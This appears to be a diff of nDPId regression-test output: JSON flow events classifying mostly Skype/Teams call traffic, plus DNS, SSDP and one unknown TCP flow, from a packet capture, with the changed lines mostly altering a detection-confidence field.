-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634728,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
